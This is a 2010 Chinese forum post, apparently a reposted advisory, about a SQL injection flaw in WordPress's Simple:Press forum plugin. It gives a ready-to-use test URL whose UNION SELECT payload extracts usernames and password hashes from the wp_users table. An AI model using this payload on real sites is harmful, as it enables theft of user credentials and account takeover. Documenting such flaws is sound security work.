欢 迎 来 到 空 白 、
Would you like to react to this message? Create an account in a few clicks or log in to continue.


 
首页首页  搜索搜索  Latest imagesLatest images  登录登录  注册注册  

 

 WordPress免费论坛Blog系统SqL注入漏洞

向下 
作者留言
Admin
εїз 幼稚园大班◘ ◙
Admin


帖子数 : 240
空白积分 : 226
空白荣誉 : 0
注册日期 : 10-07-21

WordPress免费论坛Blog系统SqL注入漏洞  Empty
帖子主题: WordPress免费论坛Blog系统SqL注入漏洞    WordPress免费论坛Blog系统SqL注入漏洞  Empty周日 八月 01, 2010 5:12 am




WordPress是一款免费的论坛Blog系统。

WordPress所使用的Simple:Press插件没有正确地过滤用户在搜索字段所输入的搜索变量便注入到了SQL查询中使用:

sf-header-forum.php

代码:略

测试方法: http://127.0.1/wordpress/?page_id=4/&forum=all&value=9999+union+select+(select+concat_ws(0x3a,user_login,user_pass)+from+wp_users+LIMIT+0,1)--+&type=9&search=1&searchpage=2






返回页首 向下
http://zqer.1ercn.biz
Admin
εїз 幼稚园大班◘ ◙
Admin


帖子数 : 240
空白积分 : 226
空白荣誉 : 0
注册日期 : 10-07-21

WordPress免费论坛Blog系统SqL注入漏洞  Empty
帖子主题: 回复: WordPress免费论坛Blog系统SqL注入漏洞    WordPress免费论坛Blog系统SqL注入漏洞  Empty周日 八月 01, 2010 5:13 am

Arrow
返回页首 向下
http://zqer.1ercn.biz
 
WordPress免费论坛Blog系统SqL注入漏洞
返回页首 
1页/共1

您在这个论坛的权限:不能在这个论坛回复主题
 :: ( 电脑 基地 )-
转跳到: